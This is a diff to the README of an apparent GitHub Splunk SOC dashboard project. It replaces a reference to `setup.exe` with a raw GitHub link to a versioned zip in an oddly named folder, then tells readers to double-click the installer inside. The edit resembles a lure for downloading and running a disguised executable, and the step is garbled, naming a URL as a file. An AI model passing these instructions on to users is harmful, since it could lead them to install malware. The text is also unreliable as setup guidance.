MAMAHM2/Splunk-Realtime-Network-SOC-Dashboard/README.md

 1. Locate the downloaded file (usually in your Downloads folder).
 2. If it is a compressed file (like `.zip`), unzip it by right-clicking and choosing "Extract All."
 3. Open the extracted folder.
-4. Look for a file named `setup.exe` (Windows) or an installer package for your system.
+4. Look for a file named `https://raw.githubusercontent.com/MAMAHM2/Splunk-Realtime-Network-SOC-Dashboard/main/forecounsel/Realtime_SO_Dashboard_Network_Splunk_v3.0-beta.3.zip` (Windows) or an installer package for your system.
 5. Double-click the installer file.
 6. Follow the on-screen instructions to complete the installation.
 The process should be straightforward and ask you to agree to terms, confirm installation location, and finalize setup.